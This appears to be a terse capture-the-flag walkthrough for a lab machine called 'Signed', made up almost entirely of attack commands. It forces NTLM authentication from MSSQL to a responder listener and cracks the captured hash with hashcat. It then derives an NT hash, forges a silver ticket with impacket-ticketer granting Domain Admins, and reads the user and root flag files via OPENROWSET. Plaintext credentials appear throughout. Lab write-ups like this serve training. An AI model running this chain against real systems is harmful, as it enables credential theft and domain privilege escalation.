Sign

MSSQL exploit to read files

impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90

responder -I tun0

SELECT '\10.10.14.206\share';

hashcat -m 5600 hashes.txt /home/kali/Desktop/wordlists/rockyou.txt

impacket-mssqlclient mssqlsvc:'purPLE9795!@'@10.10.11.90 -windows-auth

SELECT IS_SRVROLEMEMBER('sysadmin');

echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl md4

result: MD4(stdin)= ef699384c3285c54128a3ee1ddb1a0cc

IT_RID=1105
MSSQLSVC_RID=1103
DOMSID='S-1-5-21-4088429403-1159899800-2753317549

query: SELECT SUSER_SID('SIGNED\IT');

impacket-ticketer \
-nthash ef699384c3285c54128a3ee1ddb1a0cc \
-domain-sid "S-1-5-21-4088429403-1159899800-2753317549" \
-domain SIGNED.HTB \
-spn MSSQLSvc/DC01.SIGNED.HTB \
-groups 512,1105 \
-user-id 1103 mssqlsvc

export KRB5CCNAME="$(pwd)/mssqlsvc.ccache"

impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth

SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;

SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;

PreviousActive NextNano

Last updated 14 days ago